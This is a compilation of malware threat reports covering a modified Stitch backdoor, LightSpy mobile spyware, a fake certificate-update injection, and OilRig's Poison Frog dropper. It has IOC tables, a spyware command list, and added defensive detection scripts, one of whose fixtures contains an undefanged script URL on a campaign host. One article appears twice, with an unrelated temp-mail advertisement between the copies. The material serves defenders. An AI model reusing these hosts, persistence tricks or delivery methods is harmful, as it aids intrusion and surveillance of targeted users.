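        raise ValueError("not a 48-bit MAC: %r" % mac)
    pairs = [hexd[i:i + 2] for i in range(0, 12, 2)]
    return {
        "lower-colon": ":".join(pairs).lower().encode(),
        "upper-colon": ":".join(pairs).upper().encode(),
        "lower-dash": "-".join(pairs).lower().encode(),
        "upper-dash": "-".join(pairs).upper().encode(),
        "bare-lower": hexd.lower().encode(),
        "bare-upper": hexd.upper().encode(),
        "raw-bytes": bytes.fromhex(hexd),
    }


def artifact_id(mac_bytes):
    """ID as the report describes it: MD5 hex of the base64 text of the MAC."""
    return hashlib.md5(base64.b64encode(mac_bytes)).hexdigest()


def hunt(temp_listing, host_mac):
    """One finding per [ID]-(lk|cs|rf).txt file in a %TEMP% listing, noting
    whether its ID is derivable from the host's first-adapter MAC."""
    ids = {artifact_id(b): form for form, b in mac_forms(host_mac).items()}
    findings = []
    for name in temp_listing:
        m = ARTIFACT_RE.match(name)
        if not m:
            continue
        fid = m.group("id").lower()
        findings.append({
            "file": name,
            "role": KIND_MEANING[m.group("kind")],
            "id_matches_host_mac": fid in ids,
            "mac_encoding": ids.get(fid),
        })
    return findings


# Constructed host MAC and %TEMP% listing for the demonstration.
SAMPLE_MAC = "0a:1b:2c:3d:4e:5f"
SAMPLE_ID = artifact_id(mac_forms(SAMPLE_MAC)["lower-colon"])
SAMPLE_TEMP_LISTING = [
    "tmp1A2B.tmp",
    SAMPLE_ID + "-lk.txt",
    SAMPLE_ID + "-rf.txt",
    "0123456789abcdef0123456789abcdef-cs.txt",  # pattern fits, another host's ID
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_TEMP_LISTING, SAMPLE_MAC):
        print(finding)
```

A file that matches the pattern but not the host's own MAC is still worth collecting: the report notes that results are uploaded to a shared Drive space, so IDs of other infected hosts can surface in the same listing after analysis tooling copies files around.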

Modified Stitch Python backdoor

MD5 EC993FF561CBC175953502452BFA554A
Compilation date 2008-Nov-10 09:40:35
File type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
File size 7259 KB
File names flashplayer32_xa_pp_install.exe
flashplayer32pp_xa_install.exe
C2 server system0_update04driver_roots.dynamic-dns[.]net:443

This implant is a modified version of the open-source Python backdoor called Stitch, packed as a standalone PE executable with Py2exe.

Threat actors wrapped Stitch with custom Python code to perform additional operations:

  • It downloads a legitimate Adobe Flash installation program from the C2 server at startup;
  • It auto-updates the backdoor from ubntrooters.serveuser[.]com at startup;
  • It ensures persistence through schtasks [T1053] with a logon task named AdobeUpdater pointing to C:\ProgramData\package\AdobeService.exe.

Under the hood, Stitch is a remote shell program that provides classic backdoor functionalities by establishing a direct socket connection, to exchange AES-encrypted data with the remote server.

Conclusion

With almost 10 compromised websites and dozens of implanted hosts (that we know of), the attackers have set up a sizable yet very targeted water-holing attack. The toolset that’s being used seems low-budget and not fully developed, but has been modified several times in a few months to leverage interesting features like Google Drive C2, and would be characteristic of a small, agile team.

We were unable to observe any live operations, but some tracks indicate that the Godlike12 backdoor is not widespread, and is probably used to conduct reconnaissance and data-exfiltration operations.

We were unable to correlate these attacks to any known APT groups.
For more details and the latest information on this threat actor, please contact [email protected]

Appendix – IOCs

Infrastructure

Domain | IP address | Description
root20system20macosxdriver.serveusers[.]com | 45.32.154[.]111 | Watering hole targets validator server
loginwebmailnic.dynssl[.]com | 207.148.117[.]159 | Watering hole targets validator server
ubntrooters.serveuser[.]com | 45.76.43[.]153 | Stitch auto-update server
system0_update04driver_roots.dynamic-dns[.]net | 95.179.171[.]173 | Stitch C2
sys_andriod20_designer.dynamic-dns[.]net | 45.63.114[.]152 | Stitch C2
adobeflash31_install.ddns[.]info | 95.179.171[.]173 | Installer package C2
airjaldinet[.]ml | 108.61.178[.]125 | Older C++ validator C2

URLs

https://loginwebmailnic.dynssl[.]com/part/mac/contentmc.php
https://loginwebmailnic.dynssl[.]com/all/content.php
https://loginwebmailnic.dynssl[.]com/lh/content.php
https://root20system20macosxdriver.serveusers[.]com/yW6jOyQM16rj.html
https://root20system20macosxdriver.serveusers[.]com/itV6E1uKYiOo.html
http://ubntrooters.serveuser[.]com/wuservice.exe
http://ubntrooters.serveuser[.]com/upgrade.exe
http://ubntrooters.serveuser[.]com/flashplayer_update.exe
http://adobeflash31_install.ddns[.]info/flash/sys.txt
https://github[.]com/AdobeFlash32/FlashUpdate/
https://airjaldinet[.]ml/

Hashes (MD5)

0C6025A2C68E1C702A3022F1A6AE9169
1076A0EE924F198A7BD58A2DE1F060A0
10B4D3A667E06DC4B06AA542173D052C
11294E27491B496E36CA7DB9F363ADCD
11A16E109DBAF2FD080D8490328DE5A1
2E1862BC23085402EE11C88E540533C0
3989AC9EFB6A725918BD1810765D30B3
481DD1A37C86FDA68BCED0ECB2F47597
5287045D15FF60618F426AFC03BBB331
53CB974CAF909EEDCD86D2F80E75AD0A
5F19BB1688CA836B9207248F9096B9D2
6DF39D2CE9FCA27B78CC5CA0BED89703
7EB0C103AE21189AD9AD4A9804293B22
8623FA35226AC92CF6F02447AC80AFB0
9E69DDE252038B4A38EF0BFF6CE7FCD7
AD7A4333BC364DF3D4FA00B13CBBBEB4
B02ABA86409BE2AB263B1A476C1A1417
B21AF331B1752A70360B5D8DC9013F3F
B21BD93F15916A9A4AC76350D8FDBE10
BE3E563E95DEDCA0CEC9792194FFF2AC
DE2D8AF2EFED0C145690B2F13CD063B3
EC993FF561CBC175953502452BFA554A
ED081A869D30BB90B76552C83BD784C8
BEC4482890A89F0184B463C727709D53
9A819F2CE060058745FF5374221ADA7C
6DC5F8282DF76F4045F75FEA3277DF41



iOS exploit chain deploys “LightSpy” feature-rich malware

A watering hole was discovered on January 10, 2020 utilizing a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong based on the content of the landing page. Since the initial activity, we released two private reports exhaustively detailing spread, exploits, infrastructure and LightSpy implants.

Landing page of watering hole site

We are temporarily calling this APT group “TwoSail Junk”. Currently, we have hints from known backdoor callbacks to infrastructure about clustering this campaign with previous activity. And we are working with colleagues to tie LightSpy with prior activity from a long running Chinese-speaking APT group, previously reported on as Spring Dragon/Lotus Blossom/Billbug(Thrip), known for their Lotus Elise and Evora backdoor malware. Considering this LightSpy activity has been disclosed publicly by our colleagues from TrendMicro, we would like to further contribute missing information to the story without duplicating content. And, in our quest to secure technologies for a better future, we reported the malware and activity to Apple and other relevant companies.

This supplemental information can be difficult to organize to make for easy reading. In light of this, this document is broken down into several sections.

  1. Deployment timeline – additional information clarifying LightSpy deployment milestone events, including both exploit releases and individual LightSpy iOS implant component updates.
  2. Spreading – supplemental technical details on various techniques used to deliver malicious links to targets
  3. Infrastructure – supplemental description of a TwoSail Junk RDP server, the LightSpy admin panel, and some related server-side javascript
  4. Android implant and a pivot into evora – additional information on an Android implant and related infrastructure. After pivoting from the infrastructure in the previous section, we find related implants and backdoor malware, helping to connect this activity to previously known SpringDragon APT with low confidence.

More information about LightSpy is available to customers of Kaspersky Intelligence Reporting. Contact: [email protected]

Deployment timeline

During our investigation, we observed the actor modifying some components involved in the exploit chain on February 7, 2020 with major changes, and on March 5, 2020 with minor ones.

Figure 1. Brief LightSpy event timeline

The first observed version of the WebKit exploit dated January 10, 2020 closely resembled a proof of concept (PoC), containing elements such as buttons, alert messages, and many log statements throughout. The second version commented out or removed many of the log statements, changed alert() to print() statements, and also introduced some language errors such as “your device is not support…” and “stab not find…”.

By analyzing the changes in the first stage WebKit exploit, we discovered the list of supported devices was also significantly extended:
Table 1. iOS version exploit support expansion

Device iOS version Supported as of Jan 10 Supported as of Feb 7
iPhone 6 11.03 +
iPhone 6S 12.01 + commented
12.2 +
iPhone 7 12.1 +
12.11 + +
12.12 + +
12.14 +
12.2 +
iPhone 7+ 12.2 +
iPhone 8 12.2 +
iPhone 8+ 12.2 +
iPhone X 12.2 +

As seen above, the actor was actively changing implant components, which is why we are providing a full list of historical hashes in the IoC section at the end of this report. There were many minor changes that did not directly affect the functionality of each component, but there were also some exceptions to this that will be expanded on below. Based on our observations of these changes over a relatively short time frame, we can assess that the actor implemented a fairly agile development process, with time seemingly more important than stealthiness or quality.

One interesting observation involved the “EnvironmentalRecording” plugin (MD5: ae439a31b8c5487840f9ad530c5db391), which was a dynamically linked shared library responsible for recording surrounding audio and phone calls. On February 7, 2020, we noticed a new binary (MD5: f70d6b3b44d855c2fb7c662c5334d1d5) with the same name with no similarities to the earlier one. This new file did not contain any environment paths, version stamps, or any other traces from the parent plugin pattern. Its sole purpose was to clean up the implant components by erasing all files located in “/var/iolight/”, “/bin/light/”, and “/bin/irc_loader/”. We’re currently unsure whether the actor intended to replace the original plugin with an uninstall package or if this was a result of carelessness or confusion from the rapid development process.

Another example of a possible mistake involved the “Screenaaa” plugin. The first version (MD5: 35fd8a6eac382bfc95071d56d4086945) that was deployed on January 10, 2020 did what we expected: It was a small plugin designed to capture a screenshot, create a directory, and save the capture file in JPEG format. However, the plugin (MD5: 7b69a20920d3b0e6f0bffeefdce7aa6c) with the same name that was packaged on February 7 had a completely different functionality. This binary was actually a LAN scanner based on MMLanScan, an open source project for iOS that helps scan a network to show available devices along with their MAC addresses, hostname, and manufacturer. Most likely, this plugin was mistakenly bundled up in the February 7 payload with the same name as the screenshot plugin.

Figure 2. LightSpy iOS implant component layout and communications

Spreading

We cannot say definitively that we have visibility into all of their spreading mechanisms. We do know that in past campaigns, precise targeting of individuals was performed over various social network platforms with direct messaging. Both our own and others’ previous reporting have documented TwoSail Junk’s less precise and broad use of forum posts and replies. These forum posts direct individuals frequenting these sites to pages hosting iframes served from their exploit servers. We add Telegram channels and Instagram posts to the list of communication channels abused by these attackers.

These sites and communication media are known to be frequented by some activist groups.

Figure 3. LightSpy iPhone infection steps

The initial watering hole site (hxxps://appledaily.googlephoto[.]vip/news[.]html) on January 10, 2020 was designed to mimic a well known Hong Kong based newspaper “Apple Daily” by copy-pasting HTML content from the original:

Figure 4. Source of html page mimicking newspaper “Apple Daily”

However, at that time, we had not observed any indications of the site being purposely distributed in the wild. Based on our KSN detection statistics, we began seeing a massive distribution campaign beginning on February 18, 2020.

Table 2. LightSpy related iframe domains, urls, and first seen timestamps

Starting on February 18, the actors began utilizing a series of invisible iframes to redirect potential victims to the exploit site as well as the intended legitimate news site from the lure.

Figure 5. Source of html page with lure and exploit

Infrastructure

RDP Clues

The domain used for the initial watering hole page (googlephoto[.]vip) was registered through GoDaddy on September 24, 2019. No unmasked registration information was able to be obtained for this domain. The subdomain (appledaily.googlephoto[.]vip) began resolving to a non-parked IP address (103.19.9[.]185) on January 10, 2020 and has not moved since. The server is located in Singapore and is hosted by Beyotta Network, LLP.

At the time of our initial investigation, the server was listening on ports 80 (HTTP) and 3389 (RDP with SSL/TLS enabled). The certificate for the server was self-signed and created on December 16, 2019. Based on Shodan data as early as December 21, 2019, there was a currently logged in user detected whose name was “SeinandColt”.

Figure 6. Screenshot of RDP login page for the server 103.19.9[.]185

Admin Panel

The C2 server for the iOS payload (45.134.1[.]180) also appeared to have an admin panel on TCP port 50001.

The admin panel seems to be a Vue.js application bundled with Webpack. It contains two language packs: English and Chinese. A cursory analysis gives us an impression of the actual scale of the framework:

If we take a closer look at the index.js file for the panel, some interesting configurations are visible, to include a user config, an application list, log list, and other interesting settings.

The “userConfig” variable indicates other possible platforms that may have been targeted by the same actors, such as linux, windows, and routers.

Another interesting setting includes the “app_list” variable which is commented out. This lists two common applications used for streaming and chat mostly in China (QQ and Miapoi). Looking further, we can also see that the default map coordinates in the config point directly to the Tian’anmen Gate in Beijing, however, most likely this is just a common and symbolic mapping application default for the center of Beijing.

Android implants and a pivot into “evora”

During analysis of the infrastructure related to iOS implant distribution we also found a link directing to Android malware – hxxp://app.hkrevolution[.]club/HKcalander[.]apk (MD5: 77ebb4207835c4f5c4d5dfe8ac4c764d).

According to artefacts found in Google cache, this link was distributed through Telegram channels “winuxhk” and “brothersisterfacebookclub”, and Instagram posts in late November 2019, with a message lure in Chinese translated as “The Hong Kong People Calendar APP is online ~~~ Follow the latest Hong Kong Democracy and Freedom Movement. Click to download and support the frontline. Currently only Android version is available.”

Further technical analysis of the packed APK reveals the timestamp of its actual build: 2019-11-04 18:12:33. It also uses a subdomain of a domain shared with the iOS implant distribution as its C2 server: hxxp://svr.hkrevolution[.]club:8002.

Its code contains a link to another related domain:

Checking this server we found it hosted another related APK:

MD5 fadff5b601f6fca588007660934129eb
URL hxxp://movie.poorgoddaay[.]com/MovieCal[.]apk
C2 hxxp://app.poorgoddaay[.]com:8002
Build timestamp 2019-07-25 21:57:47

The distribution vector remains the same – Telegram channels:

The latest observed APK sample is hosted on a server that is unusual for the campaign context – xxinc-media[.]oss-cn-shenzhen.aliyuncs[.]com. We assume that the actors are taking steps to split the iOS and Android activities between different infrastructure pieces.

MD5 5d2b65790b305c186ef7590e5a1f2d6b
URL hxxps://xxinc-media.oss-cn-shenzhen.aliyuncs[.]com/calendar-release-1.0.1.apk
C2 hxxp://45.134.0[.]123:8002
Build timestamp 2020-01-14 18:30:30

We had not observed any indications of this URL being distributed in the wild yet.

If we take a closer look at the domain poorgoddaay[.]com, which not only hosted the malicious APK but also served as its C2, we can note two subzones of particular interest to us:

  • zg.poorgoddaay[.]com
  • ns1.poorgoddaay[.]com

We were able to work with partners to pivot into a handful of “evora” samples that use the above two subzones as their C2. Taking that a step further, using our Kaspersky Threat Attribution Engine (KTAE), we can see that the partner samples using those subzones are 99% similar to previous backdoors deployed by SpringDragon.

We are aware of other related and recent “evora” malware samples calling back to these same subnets while targeting organizations in Hong Kong as well. These additional factors help lend at least low confidence to clustering this activity with SpringDragon/LotusBlossom/Billbug.

Conclusion

This particular framework and infrastructure is an interesting example of an agile approach to developing and deploying a surveillance framework in Southeast Asia. This innovative approach is something we have seen before from SpringDragon, and LightSpy targeting geolocation at least falls within previous regional targeting of SpringDragon/LotusBlossom/Billbug APT, as does infrastructure and “evora” backdoor use.

Indicators of Compromise

File hashes

payload.dylib
9b248d91d2e1d1b9cd45eb28d8adff71 (Jan 10, 2020)
4fe3ca4a2526088721c5bdf96ae636f4 (Feb 7, 2020)

ircbin.plist
e48c1c6fb1aa6c3ff6720e336c62b278 (Jan 10, 2020)

irc_loader
53acd56ca69a04e13e32f7787a021bb5 (Jan 10, 2020)

light
184fbbdb8111d76d3b1377b2768599c9 (Jan 10, 2020)
bfa6bc2cf28065cfea711154a3204483 (Feb 7, 2020)
ff0f66b7089e06702ffaae6025b227f0 (Mar 5, 2020)

baseinfoaaa.dylib
a981a42fb740d05346d1b32ce3d2fd53 (Jan 10, 2020)
5c69082bd522f91955a6274ba0cf10b2 (Feb 7, 2020)

browser
7b263f1649dd56994a3da03799611950 (Jan 10, 2020)

EnvironmentalRecording
ae439a31b8c5487840f9ad530c5db391 (Jan 10, 2020)
f70d6b3b44d855c2fb7c662c5334d1d5 (Feb 7, 2020)

FileManage
f1c899e7dd1f721265cc3e3b172c7e90 (Jan 10, 2020)
ea9295d8409ea0f1d894d99fe302070e (Feb 7, 2020)

ios_qq
c450e53a122c899ba451838ee5250ea5 (Jan 10, 2020)
f761560ace765913695ffc04dfb36ca7 (Feb 7, 2020)

ios_telegram
1e12e9756b344293352c112ba84533ea (Jan 10, 2020)
5e295307e4429353e78e70c9a0529d7d (Feb 7, 2020)

ios_wechat
187a4c343ff4eebd8a3382317cfe5a95 (Jan 10, 2020)
66d2379318ce8f74cfbd0fb26afc2084 (Feb 7, 2020)

KeyChain
db202531c6439012c681328c3f8df60c (Jan 10, 2020)

locationaaa.dylib
3e7094eec0e99b17c5c531d16450cfda (Jan 10, 2020)
06ff47c8108f7557bb8f195d7b910882 (Feb 7, 2020)

Screenaaa
35fd8a6eac382bfc95071d56d4086945 (Jan 10, 2020)
7b69a20920d3b0e6f0bffeefdce7aa6c (Feb 7, 2020)

ShellCommandaaa
a8b0c99f20a303ee410e460730959d4e (Jan 10, 2020)

SoftInfoaaa
8cdf29e9c6cca6bf8f02690d8c733c7b (Jan 10, 2020)

WifiList
c400d41dd1d3aaca651734d4d565997c (Jan 10, 2020)

Android malware
77ebb4207835c4f5c4d5dfe8ac4c764d
fadff5b601f6fca588007660934129eb
5d2b65790b305c186ef7590e5a1f2d6b

Past similar SpringDragon evora
1126f8af2249406820c78626a64d12bb
33782e5ba9067b38d42f7ecb8f2acdc8

Domains and IPs

Implant c2
45.134.1[.]180 (iOS)
45.134.0[.]123 (Android)
app.poorgoddaay[.]com (Android)
svr[.]hkrevolution[.]club (Android)

WebKit exploit landing
45.83.237[.]13
messager[.]cloud

Spreading
appledaily.googlephoto[.]vip
www[.]googlephoto[.]vip
news2.hkrevolution[.]club
news.hkrevolution[.]club
www[.]facebooktoday[.]cc
www[.]hkrevolt[.]com
news.hkrevolt[.]com
movie.poorgoddaay[.]com
xxinc-media[.]oss-cn-shenzhen.aliyuncs[.]com

Related subdomains
app.hkrevolution[.]club
news.poorgoddaay[.]com
zg.poorgoddaay[.]com
ns1.poorgoddaay[.]com

Full Mobile Device Command List

change_config
exe_cmd
stop_cmd
get_phoneinfo
get_contacts
get_call_history
get_sms
delete_sms
send_sms
get_wechat_account
get_wechat_contacts
get_wechat_group
get_wechat_msg
get_wechat_file
get_location
get_location_coninuing
get_browser_history
get_dir
upload_file
download_file
delete_file
get_picture
get_video
get_audio
create_dir
rename_file
move_file
copy_file
get_app
get_process
get_wifi_history
get_wifi_nearby
call_record
call_photo
get_qq_account
get_qq_contacts
get_qq_group
get_qq_msg
get_qq_file
get_keychain
screenshot



Mokes and Buerak distributed under the guise of security certificates

The technique of distributing malware under the guise of legitimate software updates is not new. As a rule, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach to this well-known method: visitors to infected sites were informed that some kind of security certificate had expired. Unsurprisingly, the update on offer was malicious.

We detected the infection on variously themed websites — from a zoo to a store selling auto parts. The earliest infections found date back to January 16, 2020.

Attack pattern

This is what visitors of any of the hacked websites saw:

The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page. The URL bar still displays the legitimate address. This is what the malicious piece of code inserted into the original HTML page looks like:

From the screenshot it can be seen that the script parameters depend on the referrer, user_agent, and cookie values of the user, while the following fixed values are used as the user_agent_X and timestamp_X strings:

  • user_agent_X = Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
  • timestamp_X = 1579118411.0231 (01/15/2020 @ 8:00pm (UTC))

The code inserted by the cybercriminal loads the external malicious script ldfidfa[.]pw/jquery.js?&up= &ts= &r= &u= &c=

Malicious jquery.js script

The jquery.js script overlays an iframe that is exactly the same size as the page. The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html. As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update.

Clicking the Install (Recommended) button on the banner initiates the download of the file Certificate_Update_v02.2020.exe, which we detect as Exploit.Win32.ShellCode.gen. Analysis of the file showed it to be Trojan-Downloader.Win32.Buerak, packed using Nullsoft Scriptable Install System. It is not the only malware distributed by the attackers. For example, Backdoor.Win32.Mokes was spread via the same campaign earlier in January.
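The injection described above has two static tells a site owner or responder can check for without running the page: a script element pulled from the third-party host with the up/ts/r/u/c query pattern, and, once jquery.js has run, an iframe the size of the whole page. The following is an added example, not Kaspersky's code: a stdlib-only audit over a saved page or DOM snapshot. The HTML, the first-party and CDN hostnames, and the parameter values are constructed; only the host ldfidfa.pw, the parameter names and the timestamp_X value come from the report. Treating "ts" as carrying that timestamp is an assumption, so the check only looks for the literal value anywhere in the URL.

```python
"""Static audit of a page or DOM snapshot for the certificate-update
injection pattern. Added example (not Kaspersky's code); sample HTML and
third-party hostnames are constructed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

KNOWN_BAD_HOSTS = {"ldfidfa.pw"}               # report: ldfidfa[.]pw
INJECTED_PARAMS = {"up", "ts", "r", "u", "c"}  # report: jquery.js?&up=&ts=&r=&u=&c=
FIXED_TIMESTAMP = "1579118411.0231"           # report: timestamp_X


class _TagCollector(HTMLParser):
    """Collect script src values and iframe attributes in document order."""

    def __init__(self):
        super().__init__()
        self.scripts, self.iframes = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)


def _host_and_query(src):
    """Host ('' for relative refs) and query string of a src attribute.
    A bare 'host/path' form, as the report prints it, is accepted too."""
    s = src.strip()
    if "://" not in s and not s.startswith("//"):
        first = s.split("/", 1)[0]
        if s.startswith("/") or "." not in first:
            return "", urlparse(s).query
        s = "//" + s
    u = urlparse(s)
    return (u.hostname or "").lower(), u.query


def _is_full_page(style):
    s = style.replace(" ", "").lower()
    return "position:fixed" in s and "width:100%" in s and "height:100%" in s


def audit_page(html, first_party_host, allowed_hosts=()):
    """Return [(element, src, [reasons])] for suspicious scripts and iframes."""
    c = _TagCollector()
    c.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {first_party_host.lower()}
    findings = []
    for src in c.scripts:
        host, query = _host_and_query(src)
        params = set(parse_qs(query, keep_blank_values=True))
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known-bad host")
        elif host and host not in allowed:
            reasons.append("script from unlisted third-party host")
        if INJECTED_PARAMS <= params:
            reasons.append("up/ts/r/u/c parameter pattern")
        if FIXED_TIMESTAMP in src:
            reasons.append("fixed campaign timestamp in URL")
        if reasons:
            findings.append(("script", src, reasons))
    for a in c.iframes:
        src = a.get("src", "")
        host, _ = _host_and_query(src)
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known-bad host")
        elif host and host not in allowed:
            reasons.append("iframe from unlisted third-party host")
        if _is_full_page(a.get("style", "")):
            reasons.append("full-page overlay iframe")
        if reasons:
            findings.append(("iframe", src, reasons))
    return findings


# Constructed DOM snapshot of a compromised page after jquery.js has run.
INJECTED_SRC = ("https://ldfidfa.pw/jquery.js?&up=1&ts=1579118411.0231"
                "&r=https%3A%2F%2Fautoparts.example%2F&u=Mozilla%2F5.0&c=")
OVERLAY_SRC = "https://ldfidfa.pw//chrome.html"
SAMPLE_DOM = f"""<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cdn.com/lib.js"></script>
<script src="{INJECTED_SRC}"></script>
</head><body>
<iframe src="{OVERLAY_SRC}" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; border: 0"></iframe>
<p>Welcome to the auto parts store</p>
</body></html>"""

if __name__ == "__main__":
    for item in audit_page(SAMPLE_DOM, "autoparts.example",
                           allowed_hosts={"cdn.example-cdn.com"}):
        print(item)
```

Run against the raw HTML served by the origin, the audit catches the injected script element before any visitor loads it; run against a browser DOM snapshot, it also catches the overlay iframe that the external script creates at runtime. The allowlist keeps a site's legitimate CDN from tripping the third-party rule.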

IoC

Exploit.Win32.ShellCode.gen
B3290148681F8218ECB80CA430F9FDBA (Certificate_Update_v02.2020.exe)

Trojan-Downloader.Win32.Buerak
CE1931C2EB82B91ADB5A9B9B1064B09F

Backdoor.Win32.Mokes
094ADE4F1BC82D09AD4E1C05513F686D
F869430B3658A2A112FC85A1246F3F9D
5FB9CB00F19EAFBF578AF693767A8754
47C5782560D2FE3B80E0596F3FBA84D3

C&C
kkjjhhdff[.]site (47.245.30[.]255)
oderstrg[.]site


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Mokes and Buerak distributed under the guise of security certificates – 10 minute mail

The technique of distributing malware under the guise of legitimate software updates is not new. As a rule, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach to this well-known method: visitors to infected sites were informed that some kind of security certificate had expired. Unsurprisingly, the update on offer was malicious.

We detected the infection on variously themed websites — from a zoo to a store selling auto parts. The earliest infections found date back to January 16, 2020.

Attack pattern

This is what visitors of any of the hacked websites saw:

The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page. The URL bar still displays the legitimate address. This is what the malicious piece of code inserted into the original HTML page looks like:

From the screenshot it can be seen that the script parameters depend on the referrer, user_agent, and cookie values of the user. While the following fixed values are used as the user_agent_X and timestamp_X strings:

  • user_agent_X = Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
  • timestamp_X = 1579118411.0231 (01/15/2020 @ 8:00pm (UTC))

The code inserted by the cybercriminal loads the external malicious script ldfidfa[.]pw/jquery.js?&up= &ts= &r= &u= &c=

Malicious jquery.js script

The jquery.js script overlays an iframe that is exactly the same size as the page. The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html. As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update.

Clicking the Install (Recommended) button on the banner initiates the download of the file Certificate_Update_v02.2020.exe, which we detect as Exploit.Win32.ShellCode.gen. Analysis of the file showed it to be Trojan-Downloader.Win32.Buerak, packed using Nullsoft Scriptable Install System. It is not the only malware distributed by the attackers. For example, Backdoor.Win32.Mokes was spread via the same campaign earlier in January.

IoC

Exploit.Win32.ShellCode.gen
B3290148681F8218ECB80CA430F9FDBA (Certificate_Update_v02.2020.exe)

Trojan-Downloader.Win32.Buerak
CE1931C2EB82B91ADB5A9B9B1064B09F

Backdoor.Win32.Mokes
094ADE4F1BC82D09AD4E1C05513F686D
F869430B3658A2A112FC85A1246F3F9D
5FB9CB00F19EAFBF578AF693767A8754
47C5782560D2FE3B80E0596F3FBA84D3

C&C
kkjjhhdff[.]site (47.245.30[.]255)
oderstrg[.]site



OilRig’s Poison Frog – old samples, same trick

After we wrote our private report on the OilRig leak, we decided to scan our archives with our YARA rule, to hunt for new and older samples. Aside from finding some new samples, we believe we also succeeded in finding some of the first Poison Frog samples.

Poison Frog

We’re not quite sure whether the name Poison Frog was given to the backdoor by the malware authors or by the leakers. Either way, one of the earliest Poison Frog samples we could find uses ‘poison-frog[.]club’ as the domain name for its C2.

But before we go there, let’s first take a look at a sample (MD5 4EA656D10BE1D6EAC05D69252D270592). This is a PE32 executable, written in C#. The C# code is not that interesting; its only functionality is to drop the PowerShell script (which contains the backdoors and is embedded within the executable), execute it and delete it afterwards. The same functionality (with occasional variations in the implementation) appears in all the PE32 samples we found.

The embedded PowerShell script follows the same logic as all the dropper PowerShell scripts we found. There are two long strings called dns_ag and http_ag (although the former is an empty string in this sample) that contain the DNS and HTTP backdoor (base64 encoded). As always, persistence is achieved by using the task scheduler utility.

After base64 decoding the HTTP agent (http_ag; dns_ag is empty in this sample) and converting it from UTF-16 to ASCII, we end up with the first version of the Poison Frog HTTP backdoor: a 59-line PowerShell script. As you would expect from a 59-line backdoor written in PowerShell, its functionality is limited and its operation rather simple.
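The two decoding steps above (base64, then UTF-16LE to readable text) are mechanical, so here is a small triage helper for them, added as an example and not taken from the dropper or from the report’s own tooling. It finds the `$dns_ag` / `$http_ag` assignments in a dropper script, decodes each one, reports an empty string as an absent agent, detects UTF-16LE by the NUL high bytes and tolerates stripped base64 padding. The dropper text and the four-line stand-in agent are constructed.

```python
"""Pull the embedded agents out of a Poison Frog-style dropper script: find the
$dns_ag / $http_ag assignments, base64-decode them and turn the UTF-16LE text
into a readable PowerShell script.  Added triage example, not the dropper or
the report's tooling; the dropper text below is constructed."""
import base64
import re

AGENT_VARS = ("dns_ag", "http_ag")   # variable names used by the droppers (from the report)

_ASSIGN_RE = re.compile(
    r'\$(?P<name>dns_ag|http_ag)\s*=\s*(?P<q>["\'])(?P<blob>.*?)(?P=q)', re.S)


def _decode_agent(blob):
    """base64 -> bytes -> text; UTF-16LE is recognised by its NUL high bytes, else UTF-8."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    raw = base64.b64decode(blob)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        text = raw.decode("utf-16-le", "replace")
    else:
        text = raw.decode("utf-8", "replace")
    return text.lstrip("\ufeff")            # drop a BOM if the encoder added one


def extract_agents(dropper_script):
    """Map each agent variable to its decoded script, or None when the string is empty."""
    agents = {name: None for name in AGENT_VARS}
    for m in _ASSIGN_RE.finditer(dropper_script):
        blob = m.group("blob").strip()
        agents[m.group("name")] = _decode_agent(blob) if blob else None
    return agents


def line_count(script_text):
    return len(script_text.splitlines())


# Constructed sample dropper: empty DNS agent, a four-line stand-in HTTP agent.
_SAMPLE_AGENT = (
    "$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled}).MacAddress\n"
    "while ($true) {\n"
    "  Start-Sleep -Seconds 60\n"
    "}\n"
)
_SAMPLE_BLOB = base64.b64encode(_SAMPLE_AGENT.encode("utf-16-le")).decode("ascii")
SAMPLE_DROPPER = '$dns_ag = ""\n$http_ag = "' + _SAMPLE_BLOB + '"\n'

if __name__ == "__main__":
    for name, text in extract_agents(SAMPLE_DROPPER).items():
        print(name, "empty" if text is None else f"{line_count(text)} lines")
```

The UTF-16 heuristic matters because PowerShell’s `-EncodedCommand` convention is UTF-16LE, while hand-rolled droppers sometimes embed plain ASCII; decoding ASCII as UTF-16 silently produces garbage rather than an error.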

The agent first calculates a UID from the MAC address or the output of whoami. It then sends this UID to the C2, surrounded by random numbers and/or encapsulated within the string 24351243510. If it receives a reply exactly 11 characters long, it echoes that reply back to the C2 with a ‘1’ appended or prepended, and stores it in a variable, since the reply determines which functionality the C2 is requesting. Before acting on it, the agent sends the same reply back once more, this time with a ‘3’ appended or prepended.

